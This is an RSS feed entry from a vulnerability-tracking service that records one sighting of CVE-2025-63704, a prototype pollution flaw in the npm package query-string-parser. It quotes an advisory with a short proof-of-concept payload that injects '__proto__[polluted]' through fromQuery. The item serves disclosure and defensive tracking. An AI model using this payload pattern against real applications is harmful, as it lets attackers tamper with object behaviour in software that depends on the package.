<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 02 Jun 2026 03:32:56 +0000</lastBuildDate>
    <item>
      <title>087a794c-efd4-48a8-91a1-dd9455f587ce</title>
      <link>https://vulnerability.circl.lu/sighting/087a794c-efd4-48a8-91a1-dd9455f587ce/export</link>
      <description>{"uuid": "087a794c-efd4-48a8-91a1-dd9455f587ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63704", "type": "seen", "source": "https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b", "content": "Product: https://www.npmjs.com/package/query-string-parser\nVersion: v1.0.0\nVulnerability type: Prototype Pollution vulnerability inside query-string-parser through version 1.0.0\nCVE ID: CVE-2025-63704\nDiscovered: lelecolacola123, 6en6ar\n\nDescription: \nNPM package query-parser-string does not properly sanitize user supplied query parameters and merges them to the newly created object. \nThis happens inside _fillValue function inside index.js, when calling fromQuery to parse query parameters.\n\nPayload used:\n\n&amp;gt; const { toQuery, fromQuery } = require('query-string-parser')\n&amp;gt; const queryString = fromQuery(\"a=1&amp;amp;b=2&amp;amp;__proto__[polluted]=polluted\")\n&amp;gt; console.log(\"Query string object polluted: \"+queryString.__proto__.polluted)\n&amp;gt; console.log(\"POlluted object: \" + {}.polluted)\n&amp;gt; let obj = {}\n&amp;gt; console.log(\"Newly created obj: \" + obj.polluted)", "creation_timestamp": "2026-05-06T19:53:03.000000Z"}</description>
      <content:encoded>{"uuid": "087a794c-efd4-48a8-91a1-dd9455f587ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63704", "type": "seen", "source": "https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b", "content": "Product: https://www.npmjs.com/package/query-string-parser\nVersion: v1.0.0\nVulnerability type: Prototype Pollution vulnerability inside query-string-parser through version 1.0.0\nCVE ID: CVE-2025-63704\nDiscovered: lelecolacola123, 6en6ar\n\nDescription: \nNPM package query-parser-string does not properly sanitize user supplied query parameters and merges them to the newly created object. \nThis happens inside _fillValue function inside index.js, when calling fromQuery to parse query parameters.\n\nPayload used:\n\n&amp;gt; const { toQuery, fromQuery } = require('query-string-parser')\n&amp;gt; const queryString = fromQuery(\"a=1&amp;amp;b=2&amp;amp;__proto__[polluted]=polluted\")\n&amp;gt; console.log(\"Query string object polluted: \"+queryString.__proto__.polluted)\n&amp;gt; console.log(\"POlluted object: \" + {}.polluted)\n&amp;gt; let obj = {}\n&amp;gt; console.log(\"Newly created obj: \" + obj.polluted)", "creation_timestamp": "2026-05-06T19:53:03.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/087a794c-efd4-48a8-91a1-dd9455f587ce/export</guid>
      <pubDate>Wed, 06 May 2026 19:53:03 +0000</pubDate>
    </item>
  </channel>
</rss>
